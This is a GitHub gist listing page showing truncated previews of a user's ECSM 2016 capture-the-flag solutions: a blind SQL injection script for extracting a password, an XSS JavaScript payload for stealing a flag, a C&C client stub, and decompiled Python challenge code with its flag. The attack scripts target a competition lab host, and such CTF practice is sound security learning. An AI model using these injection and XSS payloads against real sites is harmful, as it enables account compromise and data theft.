Skip to content

Instantly share code, notes, and snippets.

View pawlos's full-sized avatar
🐛

Paweł Łukasik pawlos

🐛
87 followers · 79 following
View GitHub Profile
@pawlos
pawlos / stage4.unmangled.py
Created November 14, 2016 22:59
import hashlib
import struct
import zlib
import base64
def k(l,key):
l='{}{}'.format(l,struct.pack('i',zlib.crc32(l)))
m=[]
for i in range(len(l)):
o=key[i%len(key)]
@pawlos
pawlos / CandC.py
Created November 14, 2016 23:00
import requests # http stuff
import trojan # good thing python has everything
import time # got the time
# my secret malware panel
CNC_URL = 'https://secretpanel.ecsm2016.cert.pl'
CNC_PATH = '/get_command'
def cnc_get_command():
# get command from c&c
@pawlos
pawlos / extract-password.py
Last active February 18, 2019 11:46
Script to extract passwords
import requests
username = 'hacker'
for password_length in range(1,30):
password = "' or (username = '"+username+"' and LENGTH(password)="+str(password_length)+")-- "
result = requests.post('https://secretpanel.ecsm2016.cert.pl/login', data={'username': username, 'password':password})
if 'Logged in successfully' in result.text:
break
elif 'Internal Server Error' in result.text:
@pawlos
pawlos / steal-the-flag.js
Created November 15, 2016 13:02
JS script that extracts the flag
<script>xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
var doc = $(xmlhttp.responseText);
var href = "https://secretmessage.ecsm2016.cert.pl/"+$($(doc.find('.messages .message')[4]).find('span')[0]).find('a').attr('href');
req = new XMLHttpRequest();
req.onreadystatechange=function()
{
@pawlos
pawlos / admin.php
Created November 15, 2016 21:48
Corrupted admin.php script
<?php
require('../auth_funcs.php');
ini_set('display_errors', 1);
error_reporting(E_ALL);
$auth = false;
if (isset($_COOKIE['remember_me'])) {
$obj = json_decode($_COOKIE['remember_me'], true);
@pawlos
pawlos / decompiled.py
Last active November 22, 2016 10:27
decompiled Python file
# 2016.11.22 11:24:48 CET
#Embedded file name: task.py
import marshal
src = 'YwAAAAADAAAAGAAAAEMAAABz7wAAAGQBAGoAAGcAAGQCAGQDAGQEAGQFAGQGAGQHAGQIAGQJAGQKAGQLAGQMAGQNAGQOAGQPAGQMAGcPAERdHAB9AAB0AQB0AgB8AACDAQBkEAAXgwEAXgIAcToAgwEAfQEAdAMAZBEAgwEAfQIAfAIAfAEAawIAcuYAZAEAagAAZwAAZBIAZBMAZBQAZBUAZBYAZBcAZBgAZBkAZBoAZBsAZBwAZB0AZB4AZAsAZBwAZB8AZAMAZB0AZAgAZB4AZCAAZCEAZxYARF0VAH0AAHwAAGoEAGQiAIMBAF4CAHHGAIMBAEdIbgUAZCMAR0hkAABTKCQAAABOdAAAAAB0AQAAAF50AQAAADR0AQAAAEt0AQAAAGl0AQAAAC50AQAAAC90AQAAAE50AQAAAGp0AQAAAFB0AQAAAG90AQAAAD90AQAAAGx0AQAAADJ0AQAAAFRpAwAAAHMJAAAAWW91IHBhc3M6dAEAAABzdAEAAAB5dAEAAABudAEAAAB0dAEAAAA6dAEAAAB7dAEAAAB3dAEAAABxdAEAAABFdAEAAAA2dAEAAABmdAEAAABYdAEAAAB1dAEAAABhdAEAAAAxdAEAAAB9dAUAAABST1QxM3MFAAAATm8gOigoBQAAAHQEAAAAam9pbnQDAAAAY2hydAMAAABvcmR0CQAAAHJhd19pbnB1dHQGAAAAZGVjb2RlKAMAAAB0AQAAAGV0AwAAAHRtcHQGAAAAcGFzc3dkKAAAAAAoAAAAAHMHAAAAdGFzay5weVIcAAAAAgAAAHMKAAAAAAFfAQwBDAFvAQ=='.decode('base64')
code = marshal.loads(src)
exec code
@pawlos
pawlos / bytecode.py
Created November 22, 2016 10:30
Python bytecode extracted
3 0 LOAD_CONST 1 ('')
3 LOAD_ATTR 0 (join)
6 BUILD_LIST 0
9 LOAD_CONST 2 ('^')
12 LOAD_CONST 3 ('4')
15 LOAD_CONST 4 ('K')
18 LOAD_CONST 5 ('i')
21 LOAD_CONST 6 ('.')
24 LOAD_CONST 7 ('/')
27 LOAD_CONST 8 ('N')
@pawlos
pawlos / reconstructed.py
Created November 22, 2016 10:33
Reconstructed python code
tmp = ''
w = ''.join(['^','4','K','i','.','/','N','j','P','o','?','l','2','T','?'])
for e in w:
tmp = tmp + chr(ord(e)+3)
print 'You pass:'
passwd = raw_input()
if tmp == passwd:
t = ''.join(['s','y','n','t',':','{','w','q','E','6','f','X','u','o','f','a','4','X','N','u','1','}'])
@pawlos
pawlos / data.txt
Created November 22, 2016 11:42
Base64 strings that are transmitted from the service
Qm9vbXN0aWNrOiAkMTk5Ljk5LCBTaGVsbHM6IDM5Ljk5LCBab21iaWVzIGhlYWRzIGJsb3dpbmcgb2ZmOiBwcmljZWxlc3MuCg==
SSdsbCBzd2FsbG93IHlvdXIgc291bCEgSSdsbCBzd2FsbG93IHlvdXIgc291bCEgSSdsbCBzd2FsbG93IHlvdXIgc291bCEgU3dhbGxvdyB0aGlzLgo=
U3VyZSwgSSBjb3VsZCBoYXZlIHN0YXllZCBpbiB0aGUgcGFzdC4gSSBjb3VsZCBoYXZlIGV2ZW4gYmVlbiBraW5nLiBCdXQgaW4gbXkgb3duIHdheSwgSSAqYW0qIGtpbmcuCg==
R3Jvb3Z5Lgo=
QWZ0ZXIgYWxsLCBJJ20gYSBtYW4gYW5kIHlvdSdyZSBhIHdvbWFuLi4uIGF0IGxlYXN0IGxhc3QgdGltZSBJIGNoZWNrZWQuIEh1aCBodWguCg==
Qm9vbXN0aWNrOiAkMTk5Ljk5LCBTaGVsbHM6IDM5Ljk5LCBab21iaWVzIGhlYWRzIGJsb3dpbmcgb2ZmOiBwcmljZWxlc3MuCg==
T2ggdGhhdCdzIGp1c3Qgd2hhdCB3ZSBjYWxsIHBpbGxvdyB0YWxrLCBiYWJ5LCB0aGF0J3MgYWxsLgo=
V2VsbCBoZWxsbyBNaXN0ZXIgRmFuY3lwYW50cy4gV2VsbCwgSSd2ZSBnb3QgbmV3cyBmb3IgeW91IHBhbCwgeW91IGFpbid0IGxlYWRpbicgYnV0IHR3byB0aGluZ3MsIHJpZ2h0IG5vdzogSmFjayBhbmQgc2hpdC4uLiBhbmQgSmFjayBsZWZ0IHRvd24uCg==
TG9vaywgbWF5YmUgSSBkaWRuJ3Qgc2F5IGV2ZXJ5IHNpbmdsZSBsaXR0bGUgdGlueSBzeWxsYWJsZSwgbm8uIEJ1dCBiYXNpY2FsbHkgSSBzYWlkIHRoZW0sIHllYWguCg==
R3Jvb3Z5Lgo=
@pawlos
pawlos / quotes.txt
Created November 22, 2016 11:43
Dedoced base64 strings
Boomstick: $199.99, Shells: 39.99, Zombies heads blowing off: priceless.
I'll swallow your soul! I'll swallow your soul! I'll swallow your soul! Swallow this.
Sure, I could have stayed in the past. I could have even been king. But in my own way, I *am* king.
Groovy.
After all, I'm a man and you're a woman... at least last time I checked. Huh huh.